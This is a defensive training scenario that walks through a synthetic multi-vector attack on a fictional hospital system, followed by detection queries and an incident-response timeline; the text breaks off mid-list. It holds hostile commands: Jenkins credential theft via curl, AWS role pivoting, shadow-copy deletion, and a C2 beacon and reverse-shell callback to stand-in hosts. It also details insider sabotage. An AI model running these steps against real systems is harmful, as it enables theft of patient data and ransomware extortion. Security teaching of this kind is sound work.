SC-100: Coordinated Multi-Vector Attack -- Operation CRIMSON HARVEST¶
100th Scenario Milestone
SC-100 is the culminating scenario for Nexus SecOps, tying together techniques from across all 51 chapters. This coordinated multi-vector attack demonstrates how sophisticated threat actors combine multiple attack paths simultaneously to overwhelm defenders, exploit gaps between security teams, and achieve strategic objectives that no single vector could accomplish alone.
Educational Disclaimer¶
Synthetic Environment Only
This scenario uses 100% synthetic data for educational purposes. All IP addresses use RFC 5737 (192.0.2.x, 198.51.100.x, 203.0.113.x) or RFC 1918 (10.x, 172.16.x, 192.168.x) ranges. All domains use *.example.com. All credentials are testuser/REDACTED. No real organizations, infrastructure, or individuals are represented. Offense content is presented exclusively to improve defensive capabilities.
Scenario Overview¶
| Field | Detail |
|---|---|
| ID | SC-100 |
| Category | Advanced Persistent Threat / Multi-Vector / Healthcare / Coordinated Campaign |
| Severity | Critical |
| ATT&CK Tactics | Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Impact |
| ATT&CK Techniques | T1566.001 (Spearphishing Attachment), T1195.002 (Supply Chain: Software), T1078.004 (Cloud Accounts), T1136.003 (Create Account: Cloud), T1098 (Account Manipulation), T1550 (Use Alternate Auth Material), T1021.004 (Remote Services: SSH), T1567.002 (Exfiltration Over Web Service: Cloud Storage), T1486 (Data Encrypted for Impact) |
| Target Environment | Regional healthcare system with 12 hospitals, 4,200 beds, 28,000 employees, hybrid cloud infrastructure (Azure and AWS), Epic EHR system, connected medical devices, research division with clinical trial data, and a recently acquired telehealth subsidiary |
| Difficulty | ★★★★★ |
| Duration | 6-8 hours |
| Estimated Impact | 4 simultaneous attack vectors converging over 28 days; 2.1 million patient records accessed; clinical trial data for 3 Phase III drugs exfiltrated; ransomware deployed to 340 endpoints across 4 hospitals; 6 medical device networks compromised; insider recruited to disable backup verification; total financial impact estimated at $180M (ransom, remediation, regulatory fines, litigation); 28-day dwell time across vectors with partial detection at day 14 |
Narrative¶
Cascadia Health Partners (CHP), a fictional regional healthcare system at cascadia-health.example.com, operates 12 hospitals, 85 outpatient clinics, and a research division conducting 47 active clinical trials across oncology, cardiology, and neurology. With 28,000 employees and 4,200 beds, CHP serves 1.8 million patients annually. The organization completed a major digital transformation 18 months ago, migrating core infrastructure to a hybrid cloud architecture spanning Azure (identity, productivity, analytics) and AWS (EHR hosting, clinical data warehouse, research compute).
Six months ago, CHP acquired TeleMed Connect (telemedconnect.example.com), a telehealth startup with 120 employees and its own AWS infrastructure. The integration is ongoing -- TeleMed's AWS accounts have been connected via AWS Organizations, but security baseline alignment is incomplete. TeleMed's infrastructure uses different IAM conventions, lacks CHP's EDR deployment, and has a flatter network architecture than CHP's segmented environment.
CHP's security posture includes: a 15-person security operations center (SOC) running Microsoft Sentinel SIEM; CrowdStrike EDR on managed endpoints; Palo Alto firewalls with microsegmentation between clinical, administrative, research, and medical device networks; Zscaler for web security; privileged access management (PAM) for administrative accounts; and quarterly penetration testing. However, the security team is stretched thin by the TeleMed integration, a HIPAA audit preparation, and chronic alert fatigue (averaging 2,400 alerts/day with a 12% investigation rate).
In March 2026, a sophisticated threat actor group designated NIGHTSHADE COLLECTIVE launches a coordinated multi-vector campaign against CHP. NIGHTSHADE is a criminal organization with nation-state connections, specializing in healthcare targets for both financial extortion and intelligence collection. Their campaign combines four simultaneous attack vectors designed to overwhelm CHP's security team, exploit gaps between organizational boundaries, and achieve multiple objectives: ransomware deployment for financial extortion, patient data theft for dark web sale, and clinical trial data exfiltration for a state sponsor.
Attack Flow¶
graph TD
A[Vector 1: Phishing Campaign<br/>Targeted spearphishing of clinical staff] --> E[Day 14: Vectors Converge<br/>Coordinated privilege escalation]
B[Vector 2: Supply Chain Compromise<br/>Backdoored medical device firmware update] --> E
C[Vector 3: Cloud Misconfiguration<br/>Exploit TeleMed AWS integration gaps] --> E
D[Vector 4: Insider Recruitment<br/>Disgruntled IT admin compromised] --> E
E --> F[Phase 5: Lateral Movement<br/>Cross-network pivoting to clinical systems]
F --> G[Phase 6: Data Collection<br/>Patient records + clinical trial data]
G --> H[Phase 7: Ransomware Deployment<br/>Selective encryption of hospital systems]
H --> I[Phase 8: Detection and Response<br/>Multi-team coordinated IR]Phase Details¶
Vector 1: Spearphishing Campaign -- Targeting Clinical Staff (Days 1-7)¶
ATT&CK Technique: T1566.001 (Phishing: Spearphishing Attachment), T1204.002 (User Execution: Malicious File)
NIGHTSHADE COLLECTIVE targets CHP's clinical research coordinators with a sophisticated spearphishing campaign impersonating a legitimate clinical trial management platform. The phishing emails contain a malicious document disguised as an updated IRB (Institutional Review Board) protocol submission form.
# Simulated spearphishing campaign (educational only)
# Attacker targets clinical research coordinators
# Step 1: Reconnaissance via public sources
# NIGHTSHADE maps CHP's clinical trial leadership through:
# - ClinicalTrials.gov listings (Principal Investigators, study coordinators)
# - Published research papers with CHP affiliations
# - LinkedIn profiles of Clinical Research department staff
# - CHP's public careers page (job descriptions reveal tools used)
# Target list assembled (synthetic):
# - Dr. Jennifer Park (testuser1@cascadia-health.example.com) - Oncology PI
# - Maria Santos (testuser2@cascadia-health.example.com) - Research Coordinator
# - David Kim (testuser3@cascadia-health.example.com) - Data Manager
# All are users of "TrialSync Pro" (fictional clinical trial management platform)
# Step 2: Phishing email construction
# From: irb-submissions@trialsync-pro.example.com (attacker domain)
# To: testuser2@cascadia-health.example.com
# Subject: "ACTION REQUIRED: Updated IRB Protocol Template - FY2026 Q2"
# Attachment: IRB_Protocol_Template_v4.2_2026Q2.docm
# Step 3: Malicious document execution
# The .docm file contains a VBA macro that:
# 1. Displays a convincing IRB template to avoid suspicion
# 2. Downloads a second-stage payload from 203.0.113.55
# 3. Executes the payload via PowerShell in memory
# 4. Establishes C2 via HTTPS to cdn-health-analytics.example.com
# 5. Deploys a lightweight RAT with keylogging and screenshot capability
# C2 beacon pattern (synthetic):
POST https://cdn-health-analytics.example.com/api/v2/analytics
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/json
{"client_id": "chp-ws-rc-042", "ts": "2026-03-15T09:22:00Z",
"data": "base64_encoded_beacon_data"}
# Beacon interval: 300 seconds (5 minutes)
# C2 protocol: HTTPS POST to legitimate-looking analytics endpoint
# 3 of 8 targeted staff members opened the document and enabled macros
# Compromised workstations:
# WS-RC-042 (10.20.15.42) - Maria Santos, Research Coordinator
# WS-DM-018 (10.20.15.18) - David Kim, Data Manager
# WS-CRC-007 (10.20.15.7) - Research Assistant (secondary target)
Vector 2: Supply Chain Compromise -- Medical Device Firmware (Days 1-10)¶
ATT&CK Technique: T1195.002 (Supply Chain Compromise: Software Supply Chain)
Simultaneously, NIGHTSHADE compromises the update infrastructure for a medical device vendor that supplies patient monitoring systems to CHP. The attacker inserts a backdoor into a firmware update for bedside patient monitors deployed across CHP's ICU and telemetry units.
# Simulated supply chain compromise (educational only)
# Attacker backdoors medical device firmware update
# Step 1: Compromise medical device vendor's update server
# Target: VitalWatch Systems (fictional) at vitalwatch-medical.example.com
# Product: VitalWatch BPM-5000 bedside patient monitors
# CHP deployment: 840 monitors across 12 hospitals (ICU, telemetry, OR)
# NIGHTSHADE compromises VitalWatch's firmware build server
# via a vulnerability in their CI/CD pipeline (Jenkins)
# The attacker modifies the firmware build process to inject
# a backdoor into the BPM-5000 firmware update v8.4.2
# Compromised firmware details (synthetic):
# firmware: VitalWatch BPM-5000
# version: 8.4.2-build-2026.03.10
# backdoor_type: Embedded Linux reverse shell
# callback_host: 203.0.113.77, port 8443
# trigger: Activated 72 hours post-installation
# stealth: Backdoor process named 'vitald' (mimics legitimate daemon)
# Step 2: Firmware update distribution
# VitalWatch pushes update v8.4.2 through their normal channel
# CHP's biomedical engineering team validates checksum (MATCHES,
# because the build server was compromised before signing)
# Testing on 2 monitors shows normal functionality
# Step 3: Fleet deployment across CHP hospitals
# Day 5: Cascadia General Hospital (180 monitors) - deployed
# Day 7: Cascadia Heart Center (120 monitors) - deployed
# Day 8: Cascadia Children's (95 monitors) - deployed
# Day 10: Remaining hospitals (445 monitors) - in progress
# Day 8 (72 hours post first deployment): Backdoors activate
# 395 patient monitors begin calling back to C2
# The monitors are on a dedicated medical device VLAN (10.30.0.0/16)
# Medical device VLAN topology:
# 10.30.10.0/24 - Cascadia General ICU monitors
# 10.30.20.0/24 - Heart Center telemetry monitors
# 10.30.30.0/24 - Children's Hospital monitors
# 10.30.0.1 - Medical device management server
# Firewall: Medical VLAN can reach management server and
# vendor update servers only
# BUT: The backdoor tunnels C2 through allowed vendor connection
# (DNS CNAME pointing vitalwatch-update-2.example.com to C2 IP)
Vector 3: Cloud Misconfiguration -- TeleMed AWS Integration (Days 3-14)¶
ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts), T1580 (Cloud Infrastructure Discovery)
NIGHTSHADE exploits misconfigurations in the recently acquired TeleMed Connect's AWS infrastructure, which was hastily integrated into CHP's AWS Organization. The attacker discovers and exploits overly permissive cross-account IAM roles, unencrypted S3 buckets containing patient data, and a publicly accessible Jenkins instance.
# Simulated cloud exploitation (educational only)
# Attacker exploits TeleMed AWS integration gaps
# Step 1: Discover TeleMed's exposed Jenkins instance
# NIGHTSHADE scans CHP's IP ranges and discovers:
# https://jenkins.telemedconnect.example.com (publicly accessible)
# Jenkins version 2.387.1 (outdated, missing security patches)
# Default admin account: testuser/REDACTED (never changed)
# Step 2: Extract AWS credentials from Jenkins
curl -H "Authorization: Basic REDACTED" \
"https://jenkins.telemedconnect.example.com/credentials/store/system/domain/_/credential/aws-deploy-prod/config.xml"
# Reveals IAM User: telemed-deploy-prod, Account: 111122223333
# Step 3: Enumerate TeleMed AWS environment
aws s3 ls
# 2025-08-15 telemed-patient-records-prod
# 2025-09-01 telemed-telehealth-recordings
# 2025-10-20 telemed-analytics-data
# 2026-01-15 telemed-backups
aws s3 ls s3://telemed-patient-records-prod/ --region us-west-2
# PRE patient-encounters/
# PRE prescriptions/
# PRE lab-results/
# Total objects: 2,847,392
# CRITICAL: S3 bucket contains patient records WITHOUT encryption
# Bucket policy allows the deploy user full read/write access
# Step 4: Discover cross-account role to CHP's AWS
aws iam list-roles --query "Roles[?contains(RoleName, 'cross')]"
# CHP-TeleMed-CrossAccountRole
# Trust: arn:aws:iam::444455556666:root (entire CHP account!)
# Should be scoped to specific roles, not :root
# Step 5: Pivot to CHP's primary AWS account
aws sts assume-role \
--role-arn "arn:aws:iam::444455556666:role/TeleMed-Integration-Role" \
--role-session-name "integration-sync"
# TeleMed-Integration-Role in CHP's account has:
# - Read access to CHP's clinical data warehouse (Redshift)
# - Read/write access to shared S3 bucket for data exchange
# - Network connectivity to CHP's VPC via VPC peering
# The attacker now has a foothold in BOTH AWS accounts:
# TeleMed (111122223333): full deploy-level access
# CHP (444455556666): integration-level access with clinical data read
Vector 4: Insider Recruitment -- Disgruntled IT Administrator (Days 5-14)¶
ATT&CK Technique: T1098 (Account Manipulation), T1078 (Valid Accounts)
NIGHTSHADE recruits a disgruntled IT infrastructure administrator at CHP who was recently passed over for a promotion and is facing personal financial difficulties. The insider, James Mitchell (testuser4@cascadia-health.example.com), is offered $250,000 to perform specific actions that will support the broader attack campaign.
# Simulated insider recruitment (educational only)
# Attacker recruits IT administrator as insider threat
# Step 1: Target identification
# NIGHTSHADE identifies James Mitchell through:
# - LinkedIn activity (updated resume, looking for new roles)
# - Glassdoor review mentioning promotion disappointment
# - Dark web data broker reveals financial difficulties
# - Social engineering via encrypted messaging app
# - Mitchell manages backup systems and VM infrastructure
# Step 2: Insider tasks (agreed upon via encrypted channel)
# Task 1: Disable backup verification checks
# Mitchell modifies the Veeam backup verification script
# to always report "SUCCESS" regardless of actual status
# Actual backups continue but are never verified
# When ransomware encrypts repositories, no one knows
# Task 2: Create a dormant admin account
# svc-patch-mgmt@cascadia-health.example.com
# Added to Domain Admins group
# "Password never expires" flag set
# Description: "Patch Management Service - DO NOT DISABLE"
# Created during a batch of legitimate service account requests
# Task 3: Weaken network segmentation
# Add firewall rule allowing medical device VLAN (10.30.0.0/16)
# to reach clinical network (10.20.0.0/16)
# Justification: "Medical device integration testing"
# Change ticket CHG-2026-04872 (approved by Mitchell's own team)
# Insider actions timeline:
# Day 5: Mitchell disables backup verification
# Day 7: Mitchell creates svc-patch-mgmt admin account
# Day 10: Mitchell opens firewall between medical and clinical VLANs
# Day 12: Mitchell provides VPN credentials to attacker
# Day 14: All insider preparations complete
Phase 5: Vector Convergence -- Coordinated Privilege Escalation (Day 14-18)¶
ATT&CK Technique: T1021.004 (Remote Services: SSH), T1550 (Use Alternate Authentication Material)
On Day 14, all four vectors converge as NIGHTSHADE activates the coordinated attack. The phishing-compromised workstations, backdoored medical devices, cloud access, and insider-prepared accounts are used simultaneously to achieve deep network penetration.
# Simulated vector convergence (educational only)
# All four attack paths converge on Day 14
# Vector 1 contribution: Phishing compromised workstations
# The RAT on Maria Santos' workstation (WS-RC-042) has captured:
# - Maria's Azure AD credentials (keylogger)
# - VPN session tokens for clinical network access
# - Epic EHR session cookies (clinical application access)
# - File shares mapped: \\chp-research.example.com\clinical-trials
# Vector 2 contribution: Medical device backdoors
# 395 patient monitors providing network access from
# the medical device VLAN (10.30.0.0/16)
# With insider-opened firewall rules, these can reach clinical network
# Vector 3 contribution: Cloud access
# Credentials for both TeleMed and CHP AWS accounts
# Clinical data warehouse (Redshift) accessible
# VPC peering provides network access to cloud-hosted services
# Vector 4 contribution: Insider preparations
# - svc-patch-mgmt domain admin account ready
# - Backup verification disabled (sabotaged)
# - Medical device to clinical network firewall opened
# - VPN credentials provided to attacker
# Convergence actions:
# 1. Login to svc-patch-mgmt domain admin account
# from the medical device management server (10.30.0.1)
# Source blends with expected management traffic
# 2. Access domain controllers DC-CHP-01 (10.10.1.10)
# and DC-CHP-02 (10.10.1.11)
# Deploy additional persistence via scheduled task
# 3. Access Epic EHR application servers using Maria's
# captured credentials combined with domain admin privileges
# Epic Hyperspace: EPIC-HS-01 (10.20.10.50)
# Epic Clarity: EPIC-CLR-01 (10.20.10.60)
# 4. Access clinical data warehouse via cross-account role
# Redshift cluster: chp-clinical-dw.example.com
# The attacker now has simultaneous access to:
# - Active Directory (domain admin)
# - Clinical network (via firewall exception + device pivot)
# - Epic EHR (via stolen credentials)
# - Cloud data warehouse (via cross-account role)
# - Backup infrastructure (sabotaged by insider)
Phase 6: Data Collection -- Patient Records and Clinical Trials (Day 18-24)¶
ATT&CK Technique: T1530 (Data from Cloud Storage), T1213 (Data from Information Repositories)
With deep access across CHP's infrastructure, NIGHTSHADE systematically collects patient data and clinical trial information for exfiltration.
# Simulated data collection (educational only)
# Attacker systematically harvests healthcare data
# Target 1: Epic EHR - Patient Records
# Using Maria Santos' Epic session and domain admin account
# SQL queries against Epic Clarity (synthetic, educational only):
# Harvested: 2.1 million patient records (demographics, diagnoses,
# medications), 4.8 million encounters, 12.3 million lab results
# Total: approximately 180 GB (compressed to 42 GB)
# Target 2: AWS Clinical Data Warehouse
# Using TeleMed-Integration-Role in CHP's AWS account:
# Redshift UNLOAD exports claims data to S3
# Harvested: 3.2 million claims records
# Total: approximately 28 GB (compressed to 6 GB)
# Target 3: Clinical Trial Data
# Via file share from compromised research workstations:
# \\chp-research.example.com\clinical-trials\
# Clinical trial data accessed:
# - Phase III Oncology Trial (ONCO-2024-001): 2,400 patients
# Patient outcomes, biomarker data, genomic profiles
# - Phase III Cardiology Trial (CARD-2025-003): 1,800 patients
# Cardiac event data, imaging results, medication responses
# - Phase III Neurology Trial (NEURO-2025-007): 950 patients
# Cognitive assessment scores, MRI data, treatment protocols
# Total clinical trial data: approximately 85 GB
# Exfiltration method:
# Data staged in the shared S3 bucket (chp-telemed-exchange)
# Then transferred to attacker-controlled S3 bucket
# Large transfers split across 6 days to avoid CloudTrail volume alerts
# Total exfiltrated: approximately 133 GB across all targets
Phase 7: Ransomware Deployment -- Selective Encryption (Day 25-28)¶
ATT&CK Technique: T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery)
After completing data exfiltration, NIGHTSHADE deploys ransomware selectively across CHP's infrastructure. The attack is deliberately calibrated: critical life-safety systems are excluded to avoid immediate patient harm, while targeting systems that maximize business disruption.
# Simulated ransomware deployment (educational only)
# Attacker deploys selective ransomware across CHP
# ENCRYPT (business-critical, replaceable):
# - Electronic Health Record servers (Epic Hyperspace, Clarity)
# - Clinical documentation workstations (340 endpoints)
# - Radiology PACS servers
# - Laboratory information systems
# - Pharmacy management systems
# - Revenue cycle / billing systems
# - Backup repositories (already sabotaged by insider)
# EXCLUDE (life-safety, to avoid escalation):
# - Patient monitoring systems (VitalWatch monitors)
# - Ventilators and respiratory therapy equipment
# - Infusion pump controllers
# - Emergency department triage systems
# Step 1: Disable recovery options
# - Delete Volume Shadow Copies: vssadmin delete shadows /all /quiet
# - Encrypt Veeam backup repositories
# - Corrupt offsite backup catalog
# - Disable Windows Recovery Environment: reagentc /disable
# Step 2: Deploy via Group Policy as svc-patch-mgmt
# GPO: "Security Update KB5029922 - Critical"
# Scheduled: 03:00 AM Day 28 (Sunday morning)
# Target OUs: Clinical Workstations, Servers, Administrative
# Excluded OUs: Medical Devices, Emergency Systems
# Step 3: Execution at 03:00 AM Day 28
# Encryption: AES-256 (file) + RSA-4096 (key wrapping)
# Extension: .crimson
# Target files: .docx, .xlsx, .pdf, .mdb, .bak, .vmdk, .sql, .hl7, .dcm
# Ransom demand: 450 BTC (approximately $28.5M)
# Deadline: 72 hours before patient data published on leak site
# Contact: crimson_harvest@example.com
# Impact at 03:00 AM Day 28:
# - 340 clinical workstations encrypted across 4 hospitals
# - Epic EHR servers encrypted (12 hospitals lose EHR access)
# - PACS, lab, pharmacy systems encrypted
# - Backup repositories encrypted (recovery path destroyed)
# - 47 endpoints contained by CrowdStrike EDR before full encryption
# - 293 endpoints fully encrypted
#
# Life-safety systems unaffected:
# - Patient monitors continue displaying vital signs
# - Ventilators continue operating
# - Infusion pumps continue medication delivery
Phase 8: Detection and Multi-Team Response¶
The attack is partially detected at multiple points, but the coordinated nature overwhelms CHP's security team. Individual alerts are triaged in isolation without recognizing the connected campaign until Day 14, and the full scope is not understood until after ransomware deployment.
# Simulated detection and response timeline (educational only)
# === PARTIAL DETECTIONS (individually triaged, not correlated) ===
[Day 3] ALERT: Phishing email flagged by email gateway
3 of 8 emails blocked; 5 delivered
SOC: "standard phishing campaign" - Medium severity, not escalated
[Day 8] ALERT: Unusual outbound traffic from medical device VLAN
SOC: "VitalWatch firmware update traffic" - Low, closed
[Day 10] ALERT: New firewall rule between medical and clinical VLANs
SOC: "Approved change CHG-2026-04872" - Informational, closed
[Day 12] ALERT: New service account with Domain Admin privileges
SOC: "Batch service account request" - Low, closed
[Day 14] ALERT: Impossible travel on Maria Santos' account
SOC: "Possible credential compromise" - HIGH
Action: Password reset, but attacker already has session tokens
# === RANSOMWARE TRIGGERS FULL INCIDENT RESPONSE ===
[Day 28, 03:15 AM] CRITICAL: Mass file encryption detected
CrowdStrike EDR alerts on 340 endpoints simultaneously
47 endpoints contained; 293 fully encrypted
[Day 28, 03:30 AM] CRITICAL: Epic EHR unavailable
All 12 hospitals report EHR down
Paper-based downtime procedures activated
[Day 28, 04:00 AM] P1 INCIDENT DECLARED
- CISO notified, incident command activated
- External IR firm engaged
- FBI Cyber Division notified
- HHS notified per HIPAA breach requirements
- Board of Directors emergency session scheduled
- Patient safety: No immediate life-safety impact confirmed
Detection Queries¶
// KQL -- Detect coordinated multi-vector attack indicators
let PhishingAlerts = SecurityAlert
| where TimeGenerated > ago(30d)
| where AlertName has_any ("Phishing", "Malicious attachment")
| extend AlertCategory = "Phishing"
| project TimeGenerated, AlertCategory, CompromisedEntity, AlertSeverity;
let IdentityAlerts = SigninLogs
| where TimeGenerated > ago(30d)
| where ResultType == 0
| where RiskLevelDuringSignIn in ("medium", "high")
| extend AlertCategory = "Identity"
| project TimeGenerated, AlertCategory,
CompromisedEntity = UserPrincipalName, AlertSeverity = "Medium";
let CloudAlerts = AWSCloudTrail
| where TimeGenerated > ago(30d)
| where EventName in ("AssumeRole", "GetObject", "RunQuery")
| where UserIdentityArn contains "TeleMed" or UserIdentityArn contains "cross"
| extend AlertCategory = "Cloud"
| project TimeGenerated, AlertCategory,
CompromisedEntity = UserIdentityArn, AlertSeverity = "High";
let EndpointAlerts = DeviceFileEvents
| where TimeGenerated > ago(30d)
| where FileName endswith ".crimson" or ActionType == "FileModified"
| extend AlertCategory = "Ransomware"
| project TimeGenerated, AlertCategory,
CompromisedEntity = DeviceName, AlertSeverity = "Critical";
union PhishingAlerts, IdentityAlerts, CloudAlerts, EndpointAlerts
| summarize AlertCount = count(),
Categories = make_set(AlertCategory),
Entities = make_set(CompromisedEntity),
FirstAlert = min(TimeGenerated),
LastAlert = max(TimeGenerated)
by bin(TimeGenerated, 1d)
| where AlertCount > 5
| extend CategoryCount = array_length(Categories)
| where CategoryCount >= 2
| project TimeGenerated, AlertCount, Categories, CategoryCount,
Entities, FirstAlert, LastAlert
// KQL -- Detect medical device VLAN anomalous outbound traffic
CommonSecurityLog
| where TimeGenerated > ago(14d)
| where SourceIP startswith "10.30."
| where not(DestinationIP startswith "10.")
| where DestinationPort in (443, 8443, 80)
| summarize ConnectionCount = count(),
UniqueDestIPs = dcount(DestinationIP),
Destinations = make_set(DestinationIP),
TotalBytes = sum(SentBytes)
by SourceIP, bin(TimeGenerated, 1h)
| where ConnectionCount > 10 or UniqueDestIPs > 2
| project TimeGenerated, SourceIP, ConnectionCount,
UniqueDestIPs, Destinations, TotalBytes
// KQL -- Detect cross-account role assumption anomalies
AWSCloudTrail
| where TimeGenerated > ago(14d)
| where EventName == "AssumeRole"
| where tostring(parse_json(RequestParameters).roleArn) contains "CrossAccount"
or tostring(parse_json(RequestParameters).roleArn) contains "Integration"
| extend AssumedRole = tostring(parse_json(RequestParameters).roleArn)
| extend SourceAccount = tostring(parse_json(UserIdentityDetails).accountId)
| summarize AssumeCount = count(),
UniqueRoles = dcount(AssumedRole),
Roles = make_set(AssumedRole),
SourceIPs = make_set(SourceIpAddress)
by SourceAccount, bin(TimeGenerated, 1h)
| where AssumeCount > 5
| project TimeGenerated, SourceAccount, AssumeCount,
UniqueRoles, Roles, SourceIPs
// KQL -- Detect insider: privileged account creation
AuditLogs
| where TimeGenerated > ago(30d)
| where OperationName == "Add member to role"
| extend RoleName = tostring(TargetResources[0].displayName)
| where RoleName in ("Domain Admins", "Enterprise Admins", "Global Administrator")
| extend AddedUser = tostring(TargetResources[0].userPrincipalName)
| extend AddedBy = tostring(InitiatedBy.user.userPrincipalName)
| extend AccountType = iff(AddedUser contains "svc-", "ServiceAccount", "UserAccount")
| project TimeGenerated, AddedBy, AddedUser, RoleName, AccountType
// KQL -- Detect mass file encryption (ransomware)
DeviceFileEvents
| where TimeGenerated > ago(1d)
| where ActionType == "FileRenamed" or ActionType == "FileModified"
| where FileName endswith ".crimson" or FileName endswith ".encrypted"
| summarize EncryptedFiles = count(),
UniqueDevices = dcount(DeviceName),
Devices = make_set(DeviceName, 50),
FirstSeen = min(TimeGenerated),
LastSeen = max(TimeGenerated)
by bin(TimeGenerated, 5m)
| where EncryptedFiles > 100 or UniqueDevices > 5
| project TimeGenerated, EncryptedFiles, UniqueDevices,
Devices, FirstSeen, LastSeen
# SPL -- Detect coordinated multi-vector attack indicators
index=security sourcetype=security:alerts earliest=-30d
| eval alert_category = case(
match(alert_name, "(?i)phish"), "Phishing",
match(alert_name, "(?i)identity|signin|credential"), "Identity",
match(alert_name, "(?i)cloud|aws|azure"), "Cloud",
match(alert_name, "(?i)ransomware|encrypt|malware"), "Ransomware",
true(), "Other")
| bin _time span=1d
| stats count as alert_count,
dc(alert_category) as category_count,
values(alert_category) as categories,
values(compromised_entity) as entities,
min(_time) as first_alert,
max(_time) as last_alert
by _time
| where alert_count > 5 AND category_count >= 2
| table _time, alert_count, categories, category_count,
entities, first_alert, last_alert
# SPL -- Detect medical device VLAN anomalous outbound traffic
index=firewall sourcetype=pan:traffic
src_ip="10.30.*" NOT dest_ip="10.*"
dest_port IN (443, 8443, 80)
| bin _time span=1h
| stats count as connection_count,
dc(dest_ip) as unique_dest_ips,
values(dest_ip) as destinations,
sum(bytes_sent) as total_bytes
by src_ip, _time
| where connection_count > 10 OR unique_dest_ips > 2
| table _time, src_ip, connection_count,
unique_dest_ips, destinations, total_bytes
# SPL -- Detect cross-account role assumption anomalies
index=aws_cloudtrail sourcetype=aws:cloudtrail
eventName="AssumeRole"
(requestParameters.roleArn="*CrossAccount*"
OR requestParameters.roleArn="*Integration*")
| spath output=assumed_role path=requestParameters.roleArn
| spath output=source_account path=userIdentity.accountId
| bin _time span=1h
| stats count as assume_count,
dc(assumed_role) as unique_roles,
values(assumed_role) as roles,
values(sourceIPAddress) as source_ips
by source_account, _time
| where assume_count > 5
| table _time, source_account, assume_count,
unique_roles, roles, source_ips
# SPL -- Detect insider: privileged account creation
index=azure_ad sourcetype=azure:auditlogs
operation_name="Add member to role"
| spath output=role_name path=targetResources{0}.displayName
| search role_name IN ("Domain Admins", "Enterprise Admins",
"Global Administrator")
| spath output=added_user path=targetResources{0}.userPrincipalName
| spath output=added_by path=initiatedBy.user.userPrincipalName
| eval account_type = if(match(added_user, "svc-"), "ServiceAccount", "UserAccount")
| table _time, added_by, added_user, role_name, account_type
# SPL -- Detect mass file encryption (ransomware)
index=edr sourcetype=crowdstrike:events
(action="FileRenamed" OR action="FileModified")
(file_name="*.crimson" OR file_name="*.encrypted")
| bin _time span=5m
| stats count as encrypted_files,
dc(hostname) as unique_devices,
values(hostname) as devices,
min(_time) as first_seen,
max(_time) as last_seen
by _time
| where encrypted_files > 100 OR unique_devices > 5
| table _time, encrypted_files, unique_devices,
devices, first_seen, last_seen
Incident Response:
# Simulated incident response (educational only)
[Day 28, 04:00 UTC] ALERT: Coordinated Multi-Vector Attack response activated
[Day 28, 04:00 UTC] ACTION: Clinical safety assessment
- Patient monitoring systems: OPERATIONAL (not targeted)
- Ventilators: OPERATIONAL (not targeted)
- Infusion pumps: OPERATIONAL (not targeted)
- Emergency departments: Operational on paper downtime procedures
- Surgical cases: Non-emergency surgeries postponed
- Patient transfers: Divert to partner hospitals for imaging/labs
[Day 28, 04:30 UTC] ACTION: Network containment
- Isolate all encrypted segments from network
- Block C2 IPs (203.0.113.55, 203.0.113.77)
- Disable svc-patch-mgmt domain admin account
- Revoke all cross-account AWS roles (TeleMed integration)
- Disable telemed-deploy-prod IAM user
- Disconnect TeleMed AWS accounts from CHP Organization
- Block medical device VLAN external access entirely
- Disable VPN access for James Mitchell (insider suspect)
[Day 28, 05:00 UTC] ACTION: Evidence preservation
- Memory captures from representative encrypted endpoints
- Domain controller forensic images
- Network traffic captures (last 48 hours)
- AWS CloudTrail logs exported to forensic account
- Azure AD sign-in and audit logs preserved
- Firewall logs for medical device VLAN (full 30 days)
[Day 28, 06:00 UTC] ACTION: Multi-agency coordination
- FBI Cyber Division: Healthcare critical infrastructure attack
- HHS OCR: HIPAA breach notification (2.1M patients)
- State Attorney General: Breach notification filed
- Cyber insurance carrier: Claim filed, IR firm approved
- VitalWatch Medical: Notified of supply chain compromise
- Clinical trial sponsors: Notified of trial data breach
[Day 28, 12:00 UTC] ACTION: Recovery prioritization
Priority 1: Epic EHR (12 hospitals on paper - patient safety risk)
Priority 2: Laboratory information systems
Priority 3: Pharmacy systems (medication safety)
Priority 4: Radiology PACS (emergency imaging)
Priority 5: Administrative systems
Recovery: Clean rebuild from 45-day-old tape backups
(insider sabotaged recent backup verification)
Estimated full recovery: 21-30 days
EHR partial recovery (read-only): 5-7 days
[Day 28, 18:00 UTC] ACTION: Insider investigation
- James Mitchell interviewed by HR and legal counsel
- Forensics: encrypted messaging, firewall changes, backup sabotage
- Mitchell placed on administrative leave
- Law enforcement referral for insider threat prosecution
[Day 35] FINAL IMPACT ASSESSMENT:
Attack vectors: 4 (phishing, supply chain, cloud, insider)
Patient records compromised: 2.1 million
Clinical trials compromised: 3 Phase III studies (5,150 patients)
Endpoints encrypted: 293 (47 contained by EDR)
Hospitals with EHR downtime: 12, duration: 8 days to partial restore
Financial impact estimate:
Ransomware remediation and recovery: $45M
HIPAA fines (potential): $25-50M
Class action litigation reserve: $60M
Clinical trial disruption costs: $15M
Business interruption: $35M
Total: $180-205M
Ransom: NOT PAID (FBI recommendation)
Decision Points (Tabletop Exercise)¶
Decision Point 1 -- Alert Correlation vs. Individual Triage
Your SOC received alerts from all four vectors but triaged them individually. How do you implement cross-domain alert correlation that identifies coordinated campaigns? What SIEM correlation rules, threat intelligence enrichment, and analyst workflows would connect these dots within 24 hours?
Decision Point 2 -- Ransom Payment
The attacker demands 450 BTC ($28.5M) with a 72-hour deadline before publishing 2.1 million patient records. Backups are compromised and recovery from tape takes 21-30 days. Do you pay? What factors drive this decision? Who has authority? What are the legal, ethical, and operational implications?
Decision Point 3 -- Medical Device Supply Chain Trust
Vendor firmware was the entry point for Vector 2. How do you verify medical device firmware integrity independent of the vendor? Consider: independent firmware analysis, network behavior baselines, zero-trust device segmentation, and FDA cybersecurity guidance.
Decision Point 4 -- Insider Threat During M&A Integration
The TeleMed acquisition created security gaps, and an insider was recruited during organizational stress. How do you manage cybersecurity during M&A integration? What controls prevent insiders from sabotaging security infrastructure?
Lessons Learned¶
Key Takeaways
-
Coordinated multi-vector attacks overwhelm single-team defenses -- When phishing, supply chain, cloud, and insider threats arrive simultaneously, a SOC that triages alerts individually will miss the coordinated campaign. Organizations need cross-domain correlation, automated enrichment, and exercises that train analysts to identify multi-vector campaigns.
-
